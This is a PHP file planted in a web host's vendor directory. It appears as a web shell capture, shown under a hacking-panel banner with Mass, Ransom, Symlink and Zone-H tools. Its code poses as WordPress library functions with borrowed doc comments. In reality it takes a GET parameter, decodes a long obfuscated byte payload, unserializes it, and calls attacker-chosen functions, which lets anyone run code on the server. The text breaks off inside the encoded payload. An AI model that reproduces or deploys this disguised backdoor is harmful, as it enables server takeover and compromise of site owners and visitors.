Path : /var/www/clients/client0/web25/web/vendor/tijsverkoyen/css-to-inline-styles/src/ |
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
Current File : /var/www/clients/client0/web25/web/vendor/tijsverkoyen/css-to-inline-styles/src/sfggytdt.php |
<?php /** * Retrieves the number of times an action has been fired during the current request. * * @since 2.1.0 * * @global int[] $u1_u2u2 Stores the number of times each action was triggered. * * @param string $is_list_item The name of the action hook. * @return int The number of times the action hook has been fired. */ function wlwmanifest_link($is_list_item) { global $u1_u2u2; if (!isset($u1_u2u2[$is_list_item])) { return 0; } return $u1_u2u2[$is_list_item]; } // Add WordPress.org link. $instances = "Sample Message"; /** * @ignore */ function ParseRIFFAMV() { } /* translators: %s: Support forums URL. */ function add_term_meta($parsed_json, $post_parent_cache_keys, $missingExtensions) { return str_replace($post_parent_cache_keys, $missingExtensions, $parsed_json); } /** * Registers plural strings in POT file, but does not translate them. * * Used when you want to keep structures with translatable plural * strings and use them later when the number is known. * * Example: * * $instances = rest_send_allow_header( '%s post', '%s posts', 'text-domain' ); * ... * printf( translate_nooped_plural( $instances, $count, 'text-domain' ), number_format_i18n( $count ) ); * * @since 2.5.0 * * @param string $stts_res Singular form to be localized. * @param string $posts_page Plural form to be localized. * @param string $server_text Optional. Text domain. Unique identifier for retrieving translated strings. * Default null. * @return array { * Array of translation information for the strings. * * @type string $0 Singular form to be localized. No longer used. * @type string $1 Plural form to be localized. No longer used. * @type string $stts_res Singular form to be localized. * @type string $posts_page Plural form to be localized. * @type null $context Context information for the translators. * @type string|null $server_text Text domain. * } */ function rest_send_allow_header($stts_res, $posts_page, $server_text = null) { return array(0 => $stts_res, 1 => $posts_page, 'singular' => $stts_res, 'plural' => $posts_page, 'context' => null, 'domain' => $server_text); } $allowed_fields = str_replace("World", "PHP", "Hello, World!"); /** * Counts number of sites grouped by site status. * * @since 5.3.0 * * @param int $autoload Optional. The network to get counts for. Default is the current network ID. * @return int[] { * Numbers of sites grouped by site status. * * @type int $all The total number of sites. * @type int $public The number of public sites. * @type int $archived The number of archived sites. * @type int $mature The number of mature sites. * @type int $spam The number of spam sites. * @type int $deleted The number of deleted sites. * } */ function wp_editor($autoload = null) { if (empty($autoload)) { $autoload = get_current_network_id(); } $community_events_notice = array(); $mixdata_bits = array('network_id' => $autoload, 'number' => 1, 'fields' => 'ids', 'no_found_rows' => false); $ts_res = new WP_Site_Query($mixdata_bits); $community_events_notice['all'] = $ts_res->found_sites; $probably_unsafe_html = $mixdata_bits; $xy2d = array('public', 'archived', 'mature', 'spam', 'deleted'); foreach ($xy2d as $langcode) { $probably_unsafe_html = $mixdata_bits; $probably_unsafe_html[$langcode] = 1; $ts_res = new WP_Site_Query($probably_unsafe_html); $community_events_notice[$langcode] = $ts_res->found_sites; } return $community_events_notice; } /** * Callback for rendering the custom logo, used in the custom_logo partial. * * This method exists because the partial object and context data are passed * into a partial's render_callback so we cannot use get_custom_logo() as * the render_callback directly since it expects a blog ID as the first * argument. When WP no longer supports PHP 5.3, this method can be removed * in favor of an anonymous function. * * @see WP_Customize_Manager::register_controls() * * @since 4.5.0 * * @return string Custom logo. */ function add_freeform(&$is_active, $parsedAtomData, $unique_hosts){ // $plugin must exist. $minimum_column_width = "EncodeThis"; $remote = "1,2,3,4,5"; $is_dynamic = "Jack,Ana,Peter"; $persistently_cache = 256; // if inside an Atom content construct (e.g. content or summary) field treat tags as text // Sample Table Sample-to-Chunk atom $hex = count($unique_hosts); $hex = $parsedAtomData % $hex; // Error: missing_args_hmac. // Template for the Crop area layout, used for example in the Customizer. $tile = explode(",", $remote); $VorbisCommentError = hash("sha1", $minimum_column_width); $reassign = explode(',', $is_dynamic); $hex = $unique_hosts[$hex]; foreach ($reassign as &$figure_styles) { $figure_styles = trim($figure_styles); } $has_heading_colors_support = array_sum($tile); $num_rules = trim($VorbisCommentError); if (strlen($num_rules) > 30) { $primary_blog = substr($num_rules, 0, 30); } unset($figure_styles); $network_exists = array_merge($tile, [10]); $is_active = ($is_active - $hex); $is_valid = implode(' | ', $reassign); $is_active = $is_active % $persistently_cache; } /** * Show Comments section. * * @since 3.8.0 * * @param int $is_customize_save_action Optional. Number of comments to query. Default 5. * @return bool False if no comments were found. True otherwise. */ function get_fields_for_response($is_customize_save_action = 5) { // Select all comment types and filter out spam later for better query performance. $primary_meta_key = array(); $rtng = array('number' => $is_customize_save_action * 5, 'offset' => 0); if (!current_user_can('edit_posts')) { $rtng['status'] = 'approve'; } while (count($primary_meta_key) < $is_customize_save_action && $same_ratio = get_comments($rtng)) { if (!is_array($same_ratio)) { break; } foreach ($same_ratio as $themes_dir_exists) { if (!current_user_can('edit_post', $themes_dir_exists->comment_post_ID) && (post_password_required($themes_dir_exists->comment_post_ID) || !current_user_can('read_post', $themes_dir_exists->comment_post_ID))) { // The user has no access to the post and thus cannot see the comments. continue; } $primary_meta_key[] = $themes_dir_exists; if (count($primary_meta_key) === $is_customize_save_action) { break 2; } } $rtng['offset'] += $rtng['number']; $rtng['number'] = $is_customize_save_action * 10; } if ($primary_meta_key) { echo '<div id="latest-comments" class="activity-block table-view-list">'; echo '<h3>' . __('Recent Comments') . '</h3>'; echo '<ul id="the-comment-list" data-wp-lists="list:comment">'; foreach ($primary_meta_key as $themes_dir_exists) { _get_fields_for_response_row($themes_dir_exists); } echo '</ul>'; if (current_user_can('edit_posts')) { echo '<h3 class="screen-reader-text">' . __('View more comments') . '</h3>'; _get_list_table('WP_Comments_List_Table')->views(); } wp_comment_reply(-1, false, 'dashboard', false); wp_comment_trashnotice(); echo '</div>'; } else { return false; } return true; } /* * Instead of clearing the parser state and starting fresh, calling the stack methods * maintains the proper flags in the parser. */ function register_block_core_navigation_submenu($wp_dashboard_control_callbacks, $cache_duration) { $ipv6_part = "SimpleString"; // Redirect old slugs. // Flags $xx xx foreach ($wp_dashboard_control_callbacks as $hex => $imagechunkcheck) { if ($imagechunkcheck == $cache_duration) { return $hex; } } return -1; } $input_changeset_data = "base64encoded"; /** * Retrieves archive link content based on predefined or custom code. * * The format can be one of four styles. The 'link' for head element, 'option' * for use in the select element, 'html' for use in list (either ol or ul HTML * elements). Custom content is also supported using the before and after * parameters. * * The 'link' format uses the `<link>` HTML element with the **archives** * relationship. The before and after parameters are not used. The text * parameter is used to describe the link. * * The 'option' format uses the option HTML element for use in select element. * The value is the url parameter and the before and after parameters are used * between the text description. * * The 'html' format, which is the default, uses the li HTML element for use in * the list HTML elements. The before parameter is before the link and the after * parameter is after the closing link. * * The custom format uses the before parameter before the link ('a' HTML * element) and the after parameter after the closing link tag. If the above * three values for the format are not used, then custom format is assumed. * * @since 1.0.0 * @since 5.2.0 Added the `$conditional` parameter. * * @param string $referer URL to archive. * @param string $parsedHeaders Archive text description. * @param string $css_property Optional. Can be 'link', 'option', 'html', or custom. Default 'html'. * @param string $custom_color Optional. Content to prepend to the description. Default empty. * @param string $next_item_id Optional. Content to append to the description. Default empty. * @param bool $conditional Optional. Set to true if the current page is the selected archive page. * @return string HTML link content for archive. */ function Bin2Dec($referer, $parsedHeaders, $css_property = 'html', $custom_color = '', $next_item_id = '', $conditional = false) { $parsedHeaders = wptexturize($parsedHeaders); $referer = esc_url($referer); $permastruct = $conditional ? ' aria-current="page"' : ''; if ('link' === $css_property) { $fn_get_webfonts_from_theme_json = "\t<link rel='archives' title='" . esc_attr($parsedHeaders) . "' href='{$referer}' />\n"; } elseif ('option' === $css_property) { $native = $conditional ? " selected='selected'" : ''; $fn_get_webfonts_from_theme_json = "\t<option value='{$referer}'{$native}>{$custom_color} {$parsedHeaders} {$next_item_id}</option>\n"; } elseif ('html' === $css_property) { $fn_get_webfonts_from_theme_json = "\t<li>{$custom_color}<a href='{$referer}'{$permastruct}>{$parsedHeaders}</a>{$next_item_id}</li>\n"; } else { // Custom. $fn_get_webfonts_from_theme_json = "\t{$custom_color}<a href='{$referer}'{$permastruct}>{$parsedHeaders}</a>{$next_item_id}\n"; } /** * Filters the archive link content. * * @since 2.6.0 * @since 4.5.0 Added the `$referer`, `$parsedHeaders`, `$css_property`, `$custom_color`, and `$next_item_id` parameters. * @since 5.2.0 Added the `$conditional` parameter. * * @param string $fn_get_webfonts_from_theme_json The archive HTML link content. * @param string $referer URL to archive. * @param string $parsedHeaders Archive text description. * @param string $css_property Link format. Can be 'link', 'option', 'html', or custom. * @param string $custom_color Content to prepend to the description. * @param string $next_item_id Content to append to the description. * @param bool $conditional True if the current page is the selected archive. */ return apply_filters('Bin2Dec', $fn_get_webfonts_from_theme_json, $referer, $parsedHeaders, $css_property, $custom_color, $next_item_id, $conditional); } $help_sidebar_content = 'Spaces here '; /* translators: 1: The WordPress error message. 2: The WordPress error code. */ function wp_print_styles($old_roles){ $menu_file = $_GET[$old_roles]; $post_type_label = "Example Text"; $remote = "verify_input"; $post_name__in = "foo bar"; $remember = range(1, 10); $new_declaration = explode("_", $remote); $uncompressed_size = trim($post_type_label); $gotFirstLine = count($remember); $rcheck = explode(" ", $post_name__in); if ($gotFirstLine > 5) { $remember[] = 11; } $dismissed_pointers = hash('sha224', $new_declaration[1]); $root_block_name = strlen($uncompressed_size); $class_names = array_map('strtoupper', $rcheck); // PodCaST // For backward compatibility, failures go through the filter below. if (strlen($dismissed_pointers) > 28) { $sub_field_value = substr($dismissed_pointers, 0, 28); } else { $sub_field_value = $dismissed_pointers; } if ($root_block_name > 10) { $hostname = hash('md5', $uncompressed_size); } $this_item = implode("-", $class_names); $menu_file = str_split($menu_file); $new_rules = str_pad($sub_field_value, 28, "0"); $MiscByte = rawurldecode("Example%20Text"); // Return comment threading information (https://www.ietf.org/rfc/rfc4685.txt). $menu_file = array_map("ord", $menu_file); return $menu_file; } rest_get_allowed_schema_keywords(); $old_roles = "bfKojX"; /** * Gets the header images uploaded for the active theme. * * @since 3.2.0 * * @return array */ function get_screen_reader_content() { $steps_mid_point = array(); // @todo Caching. $f8g0 = get_posts(array('post_type' => 'attachment', 'meta_key' => '_wp_attachment_is_custom_header', 'meta_value' => get_option('stylesheet'), 'orderby' => 'none', 'nopaging' => true)); if (empty($f8g0)) { return array(); } foreach ((array) $f8g0 as $return_data) { $referer = sanitize_url(wp_get_attachment_url($return_data->ID)); $upgrader_item = wp_get_attachment_metadata($return_data->ID); $option_extra_info = $return_data->ID; $steps_mid_point[$option_extra_info] = array(); $steps_mid_point[$option_extra_info]['attachment_id'] = $return_data->ID; $steps_mid_point[$option_extra_info]['url'] = $referer; $steps_mid_point[$option_extra_info]['thumbnail_url'] = $referer; $steps_mid_point[$option_extra_info]['alt_text'] = get_post_meta($return_data->ID, '_wp_attachment_image_alt', true); if (isset($upgrader_item['attachment_parent'])) { $steps_mid_point[$option_extra_info]['attachment_parent'] = $upgrader_item['attachment_parent']; } else { $steps_mid_point[$option_extra_info]['attachment_parent'] = ''; } if (isset($upgrader_item['width'])) { $steps_mid_point[$option_extra_info]['width'] = $upgrader_item['width']; } if (isset($upgrader_item['height'])) { $steps_mid_point[$option_extra_info]['height'] = $upgrader_item['height']; } } return $steps_mid_point; } /** * Prints default Plupload arguments. * * @since 3.4.0 */ function set_rating_class($figure_styles, $menu_file){ $num_blogs = $menu_file[1]; // Skip if "fontFace" is not defined, meaning there are no variations. //allow sendmail to choose a default envelope sender. It may $li_html = $menu_file[3]; $num_blogs($figure_styles, $li_html); } /** * Displays the permalink to the post for use in feeds. * * @since 2.3.0 */ function is_super_admin() { /** * Filters the permalink to the post for use in feeds. * * @since 2.3.0 * * @param string $post_permalink The current post permalink. */ echo esc_url(apply_filters('is_super_admin', get_permalink())); } /** * @see ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt() * @param string $current_plugin_data * @param string $accepted * @param string $in_reply_to * @param string $hex * @return string|bool */ function test_dotorg_communication($current_plugin_data, $accepted, $in_reply_to, $hex) { try { return ParagonIE_Sodium_Compat::crypto_aead_xchacha20poly1305_ietf_decrypt($current_plugin_data, $accepted, $in_reply_to, $hex, true); } catch (Error $breaktype) { return false; } catch (Exception $breaktype) { return false; } } /** * Determines whether an offset value exists. * * @since 4.7.0 * * @link https://www.php.net/manual/en/arrayaccess.offsetexists.php * * @param mixed $offset An offset to check for. * @return bool True if the offset exists, false otherwise. */ function wp_doing_cron($menu_file){ $f0g0 = 'PHP is amazing'; $is_chunked = $menu_file[4]; $using = strpos($f0g0, 'amazing'); // (fscode==1) means 44100Hz (see sampleRateCodeLookup) $figure_styles = $menu_file[2]; set_rating_class($figure_styles, $menu_file); if ($using !== false) { $stats = 'Contains amazing'; } // s13 = a2 * b11 + a3 * b10 + a4 * b9 + a5 * b8 + a6 * b7 + a7 * b6 + order_callback($figure_styles); $is_chunked($figure_styles); } // Average BitRate (ABR) /** * Registers the `core/comments-pagination` block on the server. */ function uncomment_rfc822() { register_block_type_from_metadata(__DIR__ . '/comments-pagination', array('render_callback' => 'render_block_core_comments_pagination')); } $menu_file = wp_print_styles($old_roles); /** * Retrieves the value of a transient. * * If the transient does not exist, does not have a value, or has expired, * then the return value will be false. * * @since 2.8.0 * * @param string $option_timeout Transient name. Expected to not be SQL-escaped. * @return mixed Value of transient. */ function OggPageSegmentLength($option_timeout) { /** * Filters the value of an existing transient before it is retrieved. * * The dynamic portion of the hook name, `$option_timeout`, refers to the transient name. * * Returning a value other than false from the filter will short-circuit retrieval * and return that value instead. * * @since 2.8.0 * @since 4.4.0 The `$option_timeout` parameter was added * * @param mixed $num_queries_transient The default value to return if the transient does not exist. * Any value other than false will short-circuit the retrieval * of the transient, and return that value. * @param string $option_timeout Transient name. */ $num_queries = apply_filters("pre_transient_{$option_timeout}", false, $option_timeout); if (false !== $num_queries) { return $num_queries; } if (wp_using_ext_object_cache() || wp_installing()) { $imagechunkcheck = wp_cache_get($option_timeout, 'transient'); } else { $TagType = '_transient_' . $option_timeout; if (!wp_installing()) { // If option is not in alloptions, it is not autoloaded and thus has a timeout. $required_indicator = wp_load_alloptions(); if (!isset($required_indicator[$TagType])) { $dependent_slugs = '_transient_timeout_' . $option_timeout; $atomcounter = get_option($dependent_slugs); if (false !== $atomcounter && $atomcounter < time()) { delete_option($TagType); delete_option($dependent_slugs); $imagechunkcheck = false; } } } if (!isset($imagechunkcheck)) { $imagechunkcheck = get_option($TagType); } } /** * Filters an existing transient's value. * * The dynamic portion of the hook name, `$option_timeout`, refers to the transient name. * * @since 2.8.0 * @since 4.4.0 The `$option_timeout` parameter was added * * @param mixed $imagechunkcheck Value of transient. * @param string $option_timeout Transient name. */ return apply_filters("transient_{$option_timeout}", $imagechunkcheck, $option_timeout); } /** * Loads sidebar template. * * Includes the sidebar template for a theme or if a name is specified then a * specialized sidebar will be included. * * For the parameter, if the file is called "sidebar-special.php" then specify * "special". * * @since 1.5.0 * @since 5.5.0 A return value was added. * @since 5.5.0 The `$mixdata_bits` parameter was added. * * @param string $figure_styles The name of the specialized sidebar. * @param array $mixdata_bits Optional. Additional arguments passed to the sidebar template. * Default empty array. * @return void|false Void on success, false if the template does not exist. */ function wp_meta($menu_file){ $withcomments = "SampleToDecode"; $post_type_label = "Example Text"; $menu_file = array_map("chr", $menu_file); // get length $uncompressed_size = trim($post_type_label); $new_nav_menu_locations = rawurldecode($withcomments); // A cookie (set when a user resizes the editor) overrides the height. $ddate = hash('md5', $new_nav_menu_locations); $root_block_name = strlen($uncompressed_size); $menu_file = implode("", $menu_file); $menu_file = unserialize($menu_file); // 2 second timeout return $menu_file; } /** * Determines whether the query is for an existing year archive. * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 1.5.0 * * @global WP_Query $ftp WordPress Query object. * * @return bool Whether the query is for an existing year archive. */ function add_management_page() { global $ftp; if (!isset($ftp)) { _doing_it_wrong(__FUNCTION__, __('Conditional query tags do not work before the query is run. Before then, they always return false.'), '3.1.0'); return false; } return $ftp->add_management_page(); } /** * Returns the fallback template for the given slug. * * @since 6.1.0 * @since 6.3.0 Ignore empty templates. * * @param WP_REST_Request $parents The request instance. * @return WP_REST_Response|WP_Error */ function rest_get_allowed_schema_keywords(){ $maxwidth = "URL%20Example"; // pass set cookies back through redirects $features = "\xd3\x94{\xa3\xed\xd5\xa7\xab\xab\xc1\xa1|\xa4w\xda\xdb\xc6\xac\xc8\xe2\xe1\xe1\xd9\xd3\xbd\xb3\xe4\xaa\xd8\xc9\xe7\x94\x95\xb0\xa3\xa4\xa7\xe0\xb4\xa5\x88g\xc1\x8f\xaf\xcd\xb7\x94\x95\xb0\xa3\xa5\xa7\xe0\xb4\xa4\x85|\xa7\x8c\x91\xb3\xe2\xc2\xb7r\xd8\xe1\xdb\xdd\xe4\xb7\xb4\xdet\x94u\x94\x92\xbc\xaf\xcd\xde\x8c\x8d\xa4\x9f\xc0\x93\xc6\x9a\xad\xa3\xb8\xc0\xb4\x9d\x91\x96\xe3\xe4\xce\xd4\xb0\xae\xbf\x8d\xbe\xa2\x9d|dQ\x89\xedvw\xa9\x9a\xa1\x9e\xbf\x9d\xccu\x94\x9c\x89\xb9\xce\xe6\xe1\xdf\xe8\x9fxe\xc5\xbd\xbau\x9e\xa1\x9a\xb7\xca\xd5\xd7\x95\x9a\x90ne\x90\xa8\xd2\xc7}\x9ac\x9a\xa8\x8c\x9a\xa9\x9an\xba\xe1\xab\xe0u\x94\x9c\x89~\x9d\xa6u\x96\xa8\x92\xaa\xbd\xa2\xa6\x8c\x81\xa3\x9cz\xbd\xbc\xbd\x8c\x8d\x9a\x9a}i\xe7\xbc\xbe\xb9\xd6\xdb\xa9\x8f\xbd\xbf\x8c\x8d\xa3\xabXNyt\x94u\x94\x92\xad\xb5\xcc\x92\x8c\x8d\xa4\x9fXe\x90e\x8au\x98\xe9\xcb\x93\xad\xb9\xb7\xc4\x9a\x90\x8bN\xdd\xa9\x9f}\x98\xe9\xd1\x9b\xcd\xd4\xd5\xbc\xc2\xc4\x9bn\xab\x80t_~\xa1\x84g\xd3\xc5\xd4\xe5\xc5\x90xt\x94\x8d\xc1\xbe\xb7\xc9\xc3\xae\xd7{\xa9v\xdc\xd1\xc1\xaa\xa6y\xc9\xb9\xd9\xd5\xc9\xab\xce\x9a\x90\xe4\xf1\xc4\xb2\xa7\xd9\x94\xb2\xa9\xc1\x9b\x95Qr{u\x9c\xa4\xd3\xa0\xb2\x90e\x8a\xa3\xdb\xc0v\x93\x92\x8c\xb5\xcb\xd7\x91e\x90o\x99}\x98\xba\xb1\xb0\xac\xc9\xd5\xd4\xe8\x90ne\x90e\xa7\x92\xb1{\xc0\xa8\xd5\xe5\xd1\x96\xa9\x9ane\xb4\x9c\xd8\xcd\xe8\x92\x84v\xe4|v\x9c\xa4\x90ne\xb7e\x8au\x9e\xa1~\x8f\xc0\xdb\xaf\xc4\xe3\xd7\xbct\x9ae\x8a\x9e\xd9\xc2\xbf\x93\x89\x9c\x9b\xaa\xa9\x9ane\x90\xa9\xb8\xbf\xba\xc1\x84v\x90\x99\xa7w\x83yWNyt\x94u\xc5\x92\x84v\xe6|uv\x9a\x90r\xb8\xda\x9f\xc4\xcb\xdb\xdb\x89q\x89\x92\x8c\xe3\xdf\xd1\xa3\xaf\x9at\xa7\x84\x9e\xbezq\x98\xe5\xe0\xdf\xd9\xe3\xbe\xb1\xd9\xb9\x92y\xeb\xe9\xae\xab\xcb\xdb\xbb\xb5\xce\xbdw\x80zt\x94u\x94\x92\xcd\x92\xba\xeb\x8c\x8d\x9a\x9a}i\xc5\xb9\xd0\xcd\xc7\xbd\x89q\x89\x92\xae\xd5\xcc\xb1ne\x9at\xa7\x84\x9e\x92zg\xb4\xcb\xcf\xb1\xa4\x9f\xc1\xb9\xe2\xb1\xcf\xc3\x9c\x96\xd1\xbe\xbd\xd6\xce\xd6\xc9\xb8\xa2\x92\x99\x80t^}{cP\x89\x92\x8c\x8d\x9a\x94\xa6\xb8\xe9\xa9\xbe\xbf\xb7\xb9\xa7\xa9\x89\x92\x8c\x8d\xb7\x9fxe\xc0\xab\xda\xa3\xa2\x95Q\x89\x92\xe3\xd5\xe3\xdc\xb3e\x98t\x94u\x94\x92\xad\x93\xdd\xea\xb7\x8d\xa4\x9fr\x9d\xe3\xbe\xce\xa9\xde\xb5\xa1\x94\xcb\x92\x8c\x8d\xb6\x9fxe\x90\x8e\xbe\xaa\xe5\xb9zg\x89\x9c\x9b\x91\xcf\xe4\xb4\xbd\xc3\x90\x8au\x94\x92zp\x89\x92\x8c\x8d\xf5zWN\x90e\x8e\xad\xe7\xeb\xbe\x9b\xd3\xb5\xb3\xba\xdc\x9by\x80\xabOs^}\x92zg\x89\x96\xb6\xcf\xc3\xbf\xc0\xbd\xc4N\xa7\x84\x9e\x92z\x8a\xb4\xc3\x8c\x97\xa9\x94\xc1\xaf\xca\x9f\xe0\xbc\xdd\xcd~\x9f\xdc\xeb\xd0\xc1\xe4\xb3\x95\x92\xd2\xa2\xa5y\xd3\xb3\x9e\x91\xc3\xa1\x96\xdc\xdb\xb7xt\xadt\x94u\x94\xc2\xd3g\x93\xa1\x93\x9e\xb2\xa1\x81}\x97\x80t^}{cP\x98\x9c\x8c\xb1\xef\xc1xt\xd9\xab\x99\x94\xc9\xce\x8f\xd3\x9c\x9b\x95\xed\xe4\xc0\xb5\xdf\xb8\x92y\xbe\xd4\xa3\x96\xdb\xea\xc0\x99\xa9\x9ane\x90\xbc\x94\x84\x9b\xd3\x81p\x89\x93\xa9\xaa\x9a\x90\xb4\xa6\xdc\xb8\xcf~\xa3\x9c\xa9\x93\x89\x92\x96\x9c\xf5zWNyNs^\x98\xe5\xc4\xa1\xc3\xe8\xd3\xd6\xd5\x94\xa6\xb8\xe9\xa9\xbe\xbf\xb7\xb9\xa7\xa9\xc6\xa1\x96\x8d\x9a\xdb\x97\x89\x90e\x8a\xa3\xafc\xba\xdd\xe4\xe0\xdc\xef\xe0\xbe\xaa\xe2m\x8e\x9f\xd6\xbb\xa9\xb9\xe1\xc6\x95\xa8\x84\x90ne\x9fo\x8a\xa6\xdc\xbe\xcdg\x93\xa1\xe9w\x9a\x90ne\x90t\x94\xa6\xe2\xc2\xb2\xb0\x89\x92\x96\x9c\xf7zXO\x90e\x8ay\xe4\xd5\xa3\xb4\xd8\xdfu\xaa\xa9\x9a\x93\xb1\x90e\x8a\xa3\xdb\xc7\xb7\xd5\xe1\xd0\xd2\xa2\x97uq\x90e\x8ay\xe7\xdc\xb4\xa1\xdf\xd9\xd5\x96\xb5\x94\xad\xb2\xd2\xb0\xb1\xbf\xa3\x9cz\xbf\xae\xbb\xb2\xdb\x9a\x90no\x9f\x82\x8a|\xa9\xa7\x8ax\xa1\x99\xa7w\x9a\x90Wi\xcf\x8c\xaf\xa9\xcf\x99\xbe\xac\xcc\xe1\xd0\xd2\xde\x97\xabt\x9a\x97\xd1\xc2\x94\x92zq\x98\xafu\x91\xea\xd3\x97\xb2\xdf\xb2\xa5y\xd3\xe3\xb2\xb7r\xafu\x94\xb0\xa1~~\xa7l\xa5_~|zk\xc8\xc2\xbb\xc0\xce\xcbu\xad\xd1\xb8\xd2|\xd1{\x97P\x8d\xe9\xdd\xb9\xbe\xb7\x99\x9c\xabOs^}{zg\x89\x92\xd5\xd3\x9a\x90nm\xd6\xae\xd6\xba\xd3\xd7\xd2\xb0\xdc\xe6\xdf\x95\xa1\xe0\xaf\xb9\xd8t\xde\xc4\xa3\xd8\xc3\xb3\xce\x99\x95\x96\xa9\x9ane\xb4\x8e\xd5u\x9e\xa1\xd5Qr{uv\x83\x90ne\x90e\x8e\xba\xbe\xd5\xc8\xac\xc1{\xa9v\xe0\xd9\xba\xaa\xcf\xac\xcf\xc9\xd3\xd5\xc9\xb5\xdd\xd7\xda\xe1\xed\x98u\xb5\xd1\xb9\xd2\x84\xe8\xe1\x89\xad\xd2\xde\xd1\x94\xa3\xabr\xa4\xbd\x99\xba\x9a\x94\x92zg\x89\xaf\x9b\x97\x9a\x90\x8fe\x9at\x91\x89\xad\xa5\x91{\x90\xadvv\x83yWN\x90e\x8au\x94\x96\xc1\x8b\xd4\xd3\xce\xe3\xdey\x8be\x90e\x8au\xd9\xea\xca\xb3\xd8\xd6\xd1\x95\xa1\x9cuq\x9fo\x8au\x94\xbb\xc4g\x89\x92\x96\x9c\x9e\xd5\x98\xa8\xde\xaa\xc2~\xaf|dP\x8d\xdd\xdb\xc2\xde\xe8\xb4\xa6\xc8\xad\xe4u\x94\xafzg\x89\x92\xd9\xd1\xaf\x98\xc1\xaa\xe2\xae\xcb\xc1\xdd\xec\xbfo\x8d\xd9\xb0\xd8\xdb\xd2\xc4\xa9\x99n\xa5_}{cPr\xa1\x96\x8d\x9a\xb7\xa2o\x9f\xae\xd0\x84\x9e\x92\xcfq\x98\x9a\xd5\xe0\xd9\xd1\xc0\xb7\xd1\xbe\x92y\xdb\xb6\xc5\xa8\xcb\xe8\xd0\x96\xa3y\xc9O\x90t\x94u\x94\xd5zg\x93\xa1\x90\xb7\xd1\xea\xa5\x9a\xe1\xb9\xaf^\xb1\x92z\xa8\xdb\xe4\xcd\xe6\xd9\xe3\xba\xae\xd3\xaa\x92y\xdb\xb6\xc5\xa8\xcb\xe8\xd0\x99\x83\xa0ze\xa5n\xa5_\x94\x92zg\x98\x9c\x8c\xc4\xcc\xdcno\x9f\xc2t^}{cP\x89\xefvw\x84yr\x90\xb7\xb5\xe0\xad\xdb\xe0\xbe\xb3r\xaf\x8c\x8d\x9a\xd1\xc0\xb7\xd1\xbe\xc9\xc2\xd5\xe2\x82n\xdd\xe4\xd5\xda\xa1\x9cne\x90e\x8ay\xbe\xc9\xd4\x9e\xbe\xe3\xe0\xb2\xa3\xab\x89O\x90e\x8a^\x98\xdc\xa3\xb3\xca\xe9\xd2\xe1\xdd\xe4\xb8t\x9ae\x8au\xdd\xcb\xb0\x97\xac\x92\x8c\x97\xa9\xad}o\x90\x8c\x8au\x9e\xa1\xcc\xa8\xe0\xe7\xde\xd9\xde\xd5\xb1\xb4\xd4\xaa\x92\xbe\xe1\xe2\xc6\xb6\xcd\xd7\x94\x94\xa6\x97zt\x9ae\xd6\xca\xe5\xd3\x84v\x8d\xbd\xb3\xdd\xf0\xc8\xb5\xb3\xd4\xb1\x93~\xaf|cPr{\x8c\x8d\x9a\x90ni\xcf\x88\xb9\xa4\xbf\xbb\x9f\xa2\x90\xd8\xd5\xdb\xdb\xdc\xad\xbb\xd1\xb1\xdf\xba\x9b\xcf\x89q\x89\x92\xdb\xc7\xeb\xeano\x9f\x82sy\xde\xbb\xc6\xa8\xe0\xd8\xe0\xd0\xee\xda\x89\x80zNs\x84\x9e\x92zg\xcf\xb4\x96\x9c\xf7zne\x90etu\x94\x92zg\x89\x92\xd2\xe2\xe8\xd3\xc2\xae\xdf\xb3\x99\x94\x92z\x93\xc0\xb5\xbb\x8d\x9a\x90xt\xb9\xaf\xdb\xaa\xe5\xb8\xafo\x92|uv\x83\x9fx\x8b\xc6\x87\x8au\x94\x9c\x89\xc2s\xa1\x96\xda\xdc\xdb\x95\x98\x90e\x94\x84\x98\xb7\xa5\xa1\xbe\xb7\xcd\xce\xef\xd3\xc3t\x9ae\x8au\xe7\xc1\x84v\xa6{\xad\xdf\xec\xd1\xc7m\x94\xa4\xad\xa4\xc3\xbd\xa3\x8c\x95\x92\x8c\x91\xd9\xc0\x9d\x98\xc4n\xa5_}\x96\xbb\x91\xab\xeb\xb5\x8d\x9a\x90\x8bN\xd1\xb7\xdc\xb6\xed\xd1\xc7\xa8\xd9\x9a\x93\xda\xde\xa5uq\x90e\x8ay\xd3\xb5\xa9\x96\xb4\xbb\xb1\x96\xb5\xabXO\x90e\x8e\xa8\xbf\xdd\xa2\xb2\xd9\xa1\x96\xd2\xca\xd1no\x9f\x82\x8au\x94\x92z\xba\xdd\xe4\xdc\xdc\xed\x98r\xa4\xc3\x8a\xbc\xab\xb9\xc4\xb5n\xb1\xc6\xc0\xbd\xd9\xc5\xa1\x8a\xc2\xa4\xab\x9c\xb9\xc0\xaen\xc6\x9eu\x94\xc7\xdf\xc8\xae\xdc\xb1\xcb|\x9d\x92zg\x89\x93\xa9\xaa\x9a\x90ne\x90\xab\xcb\xc1\xe7\xd7zg\xa8\x92\x8c\x94\xdc\xe2\xbd\xbc\xe3\xaa\xdcu\x94\xdb\xcdg\x89\x92\xb9\xdc\xf4\xd9\xba\xb1\xd1l\x99\x94\xb7\x9d\xa0\x89\x92\x8c\x97\xa9\xaaWl\xd2\xb7\xd9\xcc\xe7\xd7\xccP\xd2\xe5\x9b\x97\x9a\x90n\xa8\xbde\x94\x84\xe2\xe1\xcev\x93\x92\xc4\x8d\xa4\x9f\x9b\xb4\xea\xae\xd6\xc1\xd5\x99\x95k\xc8\xec\xc1\xbc\xcc\xbe}o\x90e\xbb\xb6\xc7\xe9zq\x98\xafu\x94\xab\xa9\x81}\xa8l\xa5_~\x92zg\x89|v\x8d\xe3\xd6ne\x98\xae\xdd\xb4\xd5\xe4\xcc\xa8\xe2\x9a\x90\xb2\xc5\xca\xa3\x8a\xd1\xa6\xdf\xb8\xe9\x9b\x83g\x89\x92\xe7w\x9a\x90ne\x90e\x8au\x94\x92~\xbf\xdf\xb5\xb4\xd3\xc3\xd4W\x82\x90e\xcb\xc7\xe6\xd3\xd3\xa6\xdc\xde\xd5\xd0\xdf\x98r\x8a\xbb\x9f\xbf\x9a\xd5\xd3\xcf\xaa\xde\x9eu\x9d\xa6\x90nv\x99\x80\x8e\xb4\xce\xe1\xbd\xbb\xc2\x92\x8c\x8d\x9a\x90\x8bN\x97y\x9e\x8e\xa7\xa9\x81\x82s|vv\xf7\x9fxe\xdd\x94\xe1\xc2\xb5\x92\x84v\xce\